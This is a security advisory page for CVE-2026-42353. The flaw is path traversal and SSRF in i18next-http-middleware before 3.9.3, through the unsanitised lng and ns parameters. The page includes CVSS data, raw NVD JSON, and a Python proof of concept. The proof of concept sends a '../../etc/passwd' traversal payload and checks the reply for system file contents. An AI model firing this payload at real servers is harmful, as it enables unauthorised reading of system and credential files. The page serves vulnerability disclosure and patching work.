Security Vulnerability Report
CVE-2026-42353 CVSS 8.2 HIGH

Published: 2026-05-08 16:16:12
Last Modified: 2026-05-08 16:16:12

Description

i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Prior to version 3.9.3, i18next-http-middleware passes the user-controlled lng and ns values from getResourcesHandler directly into i18next.services.backendConnector.load(languages, namespaces, …) without any sanitization. Depending on which backend is configured, the unvalidated path segments enable either path traversal (a filesystem backend builds a file path from lng and ns) or SSRF (an HTTP backend builds a request URL from them). This issue has been patched in version 3.9.3.

Weaknesses: CWE-22 (Path Traversal), CWE-918 (Server-Side Request Forgery).

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No NVD CPE configuration data available yet (vulnStatus: Received).

Affected: i18next-http-middleware < 3.9.3 (fixed in 3.9.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_poc(url):
    # Target the route the application registers for getResourcesHandler.
    # The mount path is app-specific ("/locales" is only a guess); adjust it.
    target = f"{url}/locales"
    # Exploit the 'lng' parameter for path traversal. Whether this reaches
    # /etc/passwd depends on the configured backend's loadPath template
    # (e.g. "{{lng}}/{{ns}}.json" appends the namespace after the traversal),
    # so the payload usually needs tailoring to the deployment.
    params = {
        "lng": "../../etc/passwd",  # payload to escape the locales directory
        "ns": "translation",        # i18next's default namespace
    }
    try:
        r = requests.get(target, params=params, timeout=5)
        # The handler returns loaded resources as JSON, so "root:" appears only
        # if the backend reads the file and reflects its content; a non-JSON
        # file typically fails to parse, so a miss here does not prove the
        # traversal itself failed.
        if r.status_code == 200 and "root:" in r.text:
            print("[+] Vulnerability confirmed! Sensitive file read.")
            return True
        print("[-] Vulnerability not detected or payload failed.")
    except requests.RequestException as e:
        print(f"Error: {e}")
    return False


if __name__ == "__main__":
    check_poc("http://127.0.0.1:3000")

References

https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-jfgf-83c5-2c4m

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42353", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:12.197", "lastModified": "2026-05-08T16:16:12.197", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Prior to version 3.9.3, i18next-http-middleware passes the user-controlled lng and ns values from getResourcesHandler directly into i18next.services.backendConnector.load(languages, namespaces, …) without any sanitization. Depending on which backend is configured, the unvalidated path segments enable either path traversal or SSRF. This issue has been patched in version 3.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-jfgf-83c5-2c4m", "source": "[email protected]"}]}}